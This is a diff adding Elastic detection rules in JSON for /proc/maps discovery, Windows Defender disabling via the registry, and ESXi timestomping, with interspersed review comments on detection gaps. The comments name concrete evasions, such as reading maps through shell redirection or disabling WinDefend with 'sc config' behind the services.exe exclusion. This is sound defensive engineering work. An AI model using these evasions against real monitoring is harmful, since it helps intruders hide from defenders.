@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for /proc/*/maps file reads. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious /proc/maps Discovery", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\nprocess.name in (\"cat\", \"grep\") and process.args : \"/proc/*/maps\" and process.entry_leader.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n)\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entry_leader.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2f95540c-923e-4f57-9dae-de30169c68b9", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "2f95540c-923e-4f57-9dae-de30169c68b9_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_2.json b/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_2.json new file mode 100644 index 00000000000..ca508736468 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_2.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for /proc/*/maps file reads. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious /proc/maps Discovery", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\nprocess.name in (\"cat\", \"grep\") and process.args : \"/proc/*/maps\" and process.entry_leader.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n)\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entry_leader.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2f95540c-923e-4f57-9dae-de30169c68b9", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "2f95540c-923e-4f57-9dae-de30169c68b9_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_110.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_110.json new file mode 100644 index 00000000000..9390ffde7b2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_110.json 
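Review bot: The query in `2f95540c-923e-4f57-9dae-de30169c68b9_2.json` only fires when `process.name in ("cat", "grep")` receives a `/proc/*/maps` argument, so any other reader of the same file (`head`, `less`, `awk`, `strings`, `python`, `dd`) or a shell redirection such as `while read -r l; do …; done < /proc/$$/maps` produces no exec event with that argument and is missed; I believe the referenced DDexec script reads the map through the shell rather than `cat`, which should be confirmed against the reference. The version-1 and version-2 files differ only in clause order and the `## Setup` heading, so the gap is present in both. At minimum the process list should be widened, e.g. `process.name in ("cat", "grep", "head", "tail", "less", "more", "awk", "strings", "hexdump", "xxd", "dd")`, and the redirection case would need a file-access data source rather than an exec rule. It is also worth stating in `description` that the rule is execution-based and does not see `read`-builtin or redirected access, so analysts do not over-trust a quiet rule.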
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Defender Disabled via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Disabled via Registry Modification\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for configurations that disable Windows Defender or the start of its service.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if this operation was approved and performed according to the organization's change management policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Re-enable Windows Defender and restore the service configurations to automatic start.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (\n (\n registry.path: (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\"\n ) and\n registry.data.strings: (\"1\", \"0x00000001\")\n ) or\n (\n registry.path: (\n \"HKLM\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\"\n ) and\n registry.data.strings in (\"3\", \"4\", \"0x00000003\", \"0x00000004\")\n )\n ) and\n\n not\n (\n process.executable : (\n \"?:\\\\WINDOWS\\\\system32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\Security Agent\\\\NTRmv.exe\"\n ) and user.id : \"S-1-5-18\"\n )\n", + "references": [ + "https://thedfirreport.com/2020/12/13/defender-control/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2ffa1f1e-b6db-47fa-994b-1512743847eb_110", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_111.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_111.json new file mode 100644 index 00000000000..daa3d27ad68 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_111.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Defender Disabled via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Disabled via Registry Modification\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for configurations that disable Windows Defender or the start of its service.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if this operation was approved and performed according to the organization's change management policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Re-enable Windows Defender and restore the service configurations to automatic start.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (\n (\n registry.path: (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\"\n ) and\n registry.data.strings: (\"1\", \"0x00000001\")\n ) or\n (\n registry.path: (\n \"HKLM\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\"\n ) and\n registry.data.strings in (\"3\", \"4\", \"0x00000003\", \"0x00000004\")\n )\n ) and\n\n not\n (\n process.executable : (\n \"?:\\\\WINDOWS\\\\system32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\Security Agent\\\\NTRmv.exe\"\n ) and user.id : \"S-1-5-18\"\n )\n", + "references": [ + "https://thedfirreport.com/2020/12/13/defender-control/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "2ffa1f1e-b6db-47fa-994b-1512743847eb_111", + "type": "security-rule" +} \ No newline at end of file 
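Review bot: The `not (process.executable : (… services.exe, svchost.exe …) and user.id : "S-1-5-18")` exclusion at the end of the query in `2ffa1f1e-b6db-47fa-994b-1512743847eb_111.json` appears to also suppress the most common way of setting `WinDefend\Start` to 3 or 4, `sc config WinDefend start= disabled`, because that registry write is performed by the Service Control Manager (`services.exe`, as SYSTEM) on behalf of the caller rather than by `sc.exe`; please confirm against endpoint registry telemetry. If so, `services.exe` should be removed from the exclusion for the `Start` branch, or the `Start` branch paired with a process rule for `sc.exe` targeting WinDefend. Separately, `index` lists `logs-windows.sysmon_operational-*` and `endgame-*` but `related_integrations` names only the `endpoint` package; the integration that provides `logs-windows.sysmon_operational-*` should be declared there. The version-110 file differs only in the broader `logs-endpoint.events.*` index pattern.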
diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_6.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_6.json new file mode 100644 index 00000000000..b98c6b286b0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_6.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where the 'touch' command is executed on a Linux system with the \"-r\" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as \"/etc/vmware/\", \"/usr/lib/vmware/\", or \"/vmfs/*\". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ESXI Timestomping using Touch Command", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\")\nand process.name : \"touch\" and process.args : \"-r\" and process.args : (\"/etc/vmware/*\", \"/usr/lib/vmware/*\", \"/vmfs/*\")\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic 
Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.006", + "name": "Timestomp", + "reference": "https://attack.mitre.org/techniques/T1070/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_7.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_7.json new file mode 100644 index 00000000000..ee021293cbf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_7.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where the 'touch' command is executed on a Linux system with the \"-r\" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as \"/etc/vmware/\", \"/usr/lib/vmware/\", or \"/vmfs/*\". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ESXI Timestomping using Touch Command", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"touch\" and process.args == \"-r\" and\nprocess.args : (\"/etc/vmware/*\", \"/usr/lib/vmware/*\", \"/vmfs/*\")\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend 
Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.006", + "name": "Timestomp", + "reference": "https://attack.mitre.org/techniques/T1070/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_8.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_8.json new file mode 100644 index 00000000000..2dcb8510534 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_8.json 
